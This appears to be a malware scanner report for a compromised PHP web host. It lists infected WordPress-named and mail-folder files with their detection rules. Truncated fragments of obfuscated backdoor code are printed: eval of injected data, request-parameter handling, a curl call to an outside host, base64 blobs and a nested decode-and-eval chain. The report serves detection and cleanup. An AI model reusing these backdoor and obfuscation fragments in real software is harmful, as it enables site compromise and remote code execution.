<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/etc/shawndees.com/@pwcache/admin.php

Size: 1.49 kB Created: 2023-04-03 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/etc/shawndees.com/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/logs/wpt_action_logs/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/logs/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/mail/adayinthelife.net/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/mail/cur/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/mail/new/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/mail/peskin.org/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/mail/tmp/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/mail/turtlesys.com/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/mail/turtlesys.net/billing-user/.Drafts/index.php

Size: 1.49 kB Created: 2023-03-11 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/mail/turtlesys.net/bpeskin/.Drafts/dropdown.php

Size: 1.49 kB Created: 2023-09-06 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/mail/turtlesys.net/bpeskin/.turtlesys.clients.Wise/about.php

Size: 1.49 kB Created: 2023-07-01 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/mail/turtlesys.net/bpeskin/.turtlesys.contractors/admin.php

Size: 1.49 kB Created: 2023-09-29 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/mail/turtlesys.net/brother/.Drafts/themes.php

Size: 1.49 kB Created: 2023-05-18 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/mail/turtlesys.net/nagios/dropdown.php

Size: 1.49 kB Created: 2023-08-15 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5

Description	Match
